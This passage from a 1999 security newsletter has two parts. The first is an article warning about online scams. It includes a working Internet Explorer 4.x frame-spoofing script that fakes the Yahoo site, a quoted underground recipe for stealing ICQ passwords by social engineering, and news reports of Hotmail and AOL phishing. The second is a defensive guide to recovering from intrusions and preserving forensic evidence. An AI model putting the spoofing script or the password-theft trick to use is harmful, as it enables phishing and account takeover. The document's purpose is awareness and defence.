vulnerability, you could improve the scam to maximum.
Frame spoofing vulnerability is found by Georgi Guninski and it "works"
on Internet Explorer 4.x browsers (the bug was patched afterwards).
This example opens a fake www.yahoo.com website.
<********************************************************************>
<SCRIPT>
b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');
a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look
at the address bar!<BR>');a.document.write('<A HREF=\"http://www.whiteh
ats.com/guninski\">Go to Georgi Guninski\\'s home page</A></H1></BODY>
</HTML>');close()</"+"SCRIPT>%01http://www.yahoo.com");
</SCRIPT>
<********************************************************************>
All this information about successfully using Frame spoofing vulnerability
with this scam is presented in educational purpose, for you, to see
that you must be real careful, because with some little tricks you
could be deceived easily.
(3)
ICQ password stealing
If you are non-suspicious, you could easily lose your ICQ password.
This is the "ICQ exploit" that could be found on some "underground
sites on the Internet. It isn't really an exploit, but just a way
to get someone's ICQ password easily.
<********************************************************************>
Ok..the trick to this is to trick someone into putting
your email address as their email address..and then you
goto www.icq.com/password and type in their UIN..it sends
their password to the email in their info..now here are a
few tricks to get them to put your email or any email you know
the password to in their ICQ info..
1)you have a klan? Ask them to join..if they do..tell them
you have a klan email..(yourklan@hotmail.com)or whatever
tell them to put that as their email so people can contact
<********************************************************************>
So don't change your e-mail settings for ICQ, because it couldn't be
good for you (try to think, why would someone tell you that you write
his e-mail address in your ICQ settings, what could he absolutely get
than using it against you. Well most of this scams work on a social
engineering base - they try to make you believe them.
(4)
Combinations
Following two stories were picked up by news sites.
CNET (www.cnet.com) 04.03.1998 > "Hotmail suffers email scam"
A Hotmail user who registered the name "admin@hotmail.com" sent out
official-sounding email to an indeterminate number of people earlier
this week telling users that "The trial period for your free Hotmail
Service is rapidly coming to a close."
It goes on to tout Hotmail's features and tells users the accounts will
cost $10 per year. It then requests that the user send an email to
"admin@hotmail.com" for an account form.
"Payments will be accepted by certified cheque, money order, or credit
cards only," it states.
Hotmail pulled the account yesterday as soon as the staff found out
about it, said Randy Delucchi, Hotmail's director of customer service.
Delucchi said he wasn't sure how many people got the email message,
but added he was sure it "wasn't very widespread at all," because
Hotmail has implemented antispam measures that prevent email from being
sent to more than 25 people at a time.
Spammers generally like to send email to thousands of people at once.
This is not the first time people have used free email to try to scam
their fellow Netizens.
In December, someone used Yahoo's free email to send out an
official-looking letter telling users they had won a modem from Yahoo
and would have to supply their names, addresses, and telephone numbers
as well as a credit card number to pay for shipping.
CNET (www.cnet.com) 22.04.1999 > "AOL warns of email scam"
America Online is warning users that email messages posing as
AOL-endorsed offers and notices are really trying to gather sensitive
member information.
A number of these messages have such subject headings as "AOL Server
Error," "AOL Billing Problem," "Beanie Babies," or "AOL Rewards," and
are intended to lure members to open them, according to a cautionary
posting on the "Neighborhood Watch" page within AOL's proprietary
service.
The warning says the messages contain HTML hyperlinks that lead to
Web sites pretending to be a standard registration Web page. But these
pages ask for member screen names or passwords, which could potentially
lead scammers into AOL member accounts.
One sample email reads: "A database error has deleted the information
for over 25,000 accounts, and yours is one. In order for us to access
the back-up data of your account, we do need your password. Without
your password, we will NOT be able to allow you to sign onto America
Online within the next 24 hours after your opening of this letter."
According to AOL spokesman Rich D'Amato, AOL posted its warnings three
weeks ago, prompted by "member complaints, as well as emails that we
had been seeing."
So you got the point, be very carefull. Scams are different: from the
realy pathetic ones (that Hotmail hacking) to more complecsive (using
frame spoofing). Also note that hack/hacking words are under " ",
because scams are in no way means or ways of hacking.
Berislav Kucan
aka BHZ
bhz@net-security.org
http://net-security.org
XII. Intrusion and detection part two
---------------------------------------
This is a follow-up to last week's article on responding to an intrusion,
which can be found at http://default.net-security.org/dl/default2.txt.
Today I'll go into a more in-depth look at recovering from an intrusion,
and a brief look at computer forensics -- i.e., what to do if you want to
try to get the law involved in the incident.
Much like any other part of intrusion response, recovery from attack
starts before you've been attacked. It can be very difficult to recover
if you don't have recent backups of your system -- back things up
regularly; nightly if possible. If you've got important information on
your system, a nightly backup just makes sense. I prefer backing up to
tape if you can afford a tape drive, but it's not a requirement. What you
do need is some form of backup that holds your important system files and
binaries, so you can restore if something happens, or a rescue disk that
contains clean versions of important system binaries. Also (preferably at
the time when you actually install your operating system, so you're sure
it's clean), run a program that checks your system. Tripwire, for
instance, is a wonderful tool that works on Solaris, Linux, and Windows
NT. It takes a sort of snapshot of your system and creates a database
which contains the checksum, creation date, and access permissions for
each file. If you feel that your system may have been compromised, you
can run tripwire against it again, and compare the results to see if
anything's changed (tripwire can even be run regularly, to detect
changes; perhaps run it just before your regular backup, to see if
anything's been altered since your last backup). Tripwire aids in
recovery because it can point out exactly which files were damaged or
altered, as in the case of trojaned binaries and rootkits, and can allow
quick replacement of them with good copies. And of course, the third
thing to do before an intrusion begins is to be aware of intrusion
detection tools. Run them, watch the logs, and be alert -- you can't
recover from an attack you don't know happened.
As I discussed last week, one of the most important things you can do is
log, and maintain the integrity of your logs. The need for good logs
really comes into play here, in several different ways. For the purposes
of this article, I'm assuming that you have intrusion detection tools
running, tripwire installed, and are watching and recording your logs. I
should note that it's best to log to a remote, secure loghost, log to a
printer, or at least make sure that if your logs are on the same host,
your log files are append-only (only new text can be added) -- most
rootkits now go through and edit logs to remove an attacker's traces. If
you're logging to a different machine or a cheap dot matrix printer in the
corner, they'll have a hard time covering their tracks -- I'm going to
assume, for this article, that your logs are intact.
When your intrusion detection software starts sending out alerts, the most
important rule is -not- to panic. You cannot react faster than data can
come in to your computer -- by the time you've noticed the attack, the
attacker is already several steps ahead of you, and may already be in your
system before you can react.
Isolate the machine. There is one school of thought that advocates
pulling the power cord out of the computer (don't shut down first; many
rootkits install cleanup routines in the system's shutdown proceedures,
and you'll lose anything they'd added). I don't advocate this as a first
step -- I suggest pulling the network cable (modem, ethernet, whatever you
have connecting your machine to the internet). Pulling the power can lose
you a lot of information that would be helpful in diagnostics -- a lot of
scripts put files in /tmp, for instance, and on some operating systems
that would be lost on a power-down. Once you've gotten the information
you need, run tripwire to get a new database of exactly what the system
looks like now...-then- pull the power cord (again, don't shutdown
normally). The reason for this becomes important later.
It's at this point that you need to decide whether or not to pursue legal
action. In most cases, especially for home users, the hassle of law
enforcement involvement is not worth it, and all you'll want to do is
rebuild and secure your machine. At the end of this article is a brief
discussion of what to do if you -do- want to involve law enforcement.
You've been attacked -- now it's time to rebuild. You have two options --
the easy way and the paranoid way. The paranoid way is pretty
self-explanatory: wipe -everything- and restore from a known clean backup
or reinstall from read-only media. For the easy way, turn your system
back on, but -don't- plug it into the network. Get your clean backup
disk (run tripwire on your backup to make certain it's clean), find the
files that were altered (compare the backup's tripwire database with the
current files on your system), and replace them with the safe binaries
you'd had on your backup. Commonly replaced binaries include /bin/login,
/bin/ps, /bin/ls, /bin/df, /usr/etc/in.telnetd, /usr/etc/in.ftpd,
/usr/etc/in.tftpd, /usr/sbin/ifconfig, etc (note that these locations may
be different for different flavors of UNIX). Check -everything- -- files
can be changed in unexpected ways, or be added in unusual places. Some
attackers like to hide their files, for instance, in /tmp, /etc/tmp,
/var/temp, /usr/spool, etc. Look for files with spaces in the name. Look
for alterations of /etc/hosts.equiv, /bin/.rhosts (or any .rhosts file at
all), /etc/passwd, /etc/group, etc. 'Find' is a good command for this; it
can be used to find all suid/sgid files, sneaky .rhosts, etc. Look for
suid root binaries in unexpected places. Next, look to make sure there
isn't a sniffer installed. On UNIX-based machines, if a sniffer's
installed on an interface, the interface will have the PROMISC flag set
(short for 'promiscuous' -- it means the interface is listening to all the
traffic on the network, not just the packets intended for that interface).
Sounds easy? Not so. There are scripts that install a sniffer -and- hide
the PROMISC flag. The way to check is to set the interface PROMISC
yourself, and then check to see if the PROMISC flag shows up. If it
doesn't show up, you may have a problem -- make sure you replace ifconfig
with a known good copy, and again, look for strange suid binaries and
files owned by root that shouldn't be.
Personally, I recommend wiping everything and starting from a good backup.
It's safer, and you don't need to worry about having missed something
important. Reinstalling from known good media may be paranoid, but it
obviates a lot of the work of finding all files that have been tampered
with, and will remove things like sniffers and back doors. If you'd like
to do an in-depth analysis, make a complete sector-by-sector copy of the
compromised disk before you wipe it, then mount (don't boot, mount) the
copy read-only on a known good system, and do your analysis there.
Now start going through the logs. What happened? Do you see anything
unusual? Look as far back through your logs as you can; maybe you'll see
the initial intrusion. Using another computer (or using the hacked
system, if you feel lucky, punk), use search engines to look up anything
in your logs you don't understand; you may be surprised at what you find.
The goal is to find out exactly how the attacker got in, find the hole,
and repair it. Most commonly-exploited holes have patches -- do some
research on your favorite search engine, find the exploit, find the patch,
and fix the hole. If you can't find anything that might have been used
against you (and be sure to look in the Bugtraq archives at
http://www.securityfocus.com/ -- click on 'forums' and then 'bugtraq',
then 'archive'), you may want to email cert@cert.org to notify the CERT
team. They may not respond, but if it really is a new exploit, they'll
look into it -- see http://www.cert.org/tech_tips/incident_reporting.html
for more information. Once you've got your system patched and replaced
all the altered files, change all passwords on the system, just in case
the attacker has your /etc/passwd (or /etc/shadow) file.
But suppose you -do- want to take the matter to law enforcement. The most
important thing you can do, if that's the case, is to preserve
evidence...and your hard drive is evidence. When you pulled the power on
your hacked machine, you preserved as much of the current state of your
system as you could. Now you need to physically remove the hard drive
from the computer, set it to read-only (if you want to do analysis on it,
make a complete physical sector-by-sector copy, and mount it -- don't boot
it -- read-only on a known 'good' system, and do your analysis on -that-),
and place it in a safe along with a copy of the original tripwire database
and a copy of the tripwire database you'd taken just before pulling the
plug. Also put into the safe all of the relevant logs, also in read-only
format to prove they have not been edited -- one idea is to print out
your logs, sign and date them, and have them notarized to prove the
electronic copies have not been tampered with. Include as well as much
information as you had been able to gather about the attacker (see the
previous article at http://default.net-security.org/dl/default2.txt for a
simple discussion of how to identify the attacker). The more information
you can provide law enforcement, the more likely they are to be able to
prosecute. Document everything you possibly can -- a clear chain of
evidence must be compiled before you can hope to have anything done, and
you must be able to show that that evidence has not been tampered with.
Once you have all your evidence, contact law enforcement -- I should note
that, just as it's a good idea to know who your ISP's security team is
ahead of time, it's handy to know ahead of time who to contact among local
law.
And be nice to them. You -want- them to like you.
Comments to this article are welcome -- not everyone responds to incidents
in the same way, and I'd be very interested in hearing other methods, or
hearing opinions I may not have considered yet.
/dev/null
null@fiend.enoch.org
(thanks to mike@enoch.org for his help with this article)
--------------------------------------------------------------------------------
Default newsletter Issue #3
http://default.net-security.org
27.08.1999 Help Net Secutity
http://www.net-security.org
--------------------------------------------------------------------------------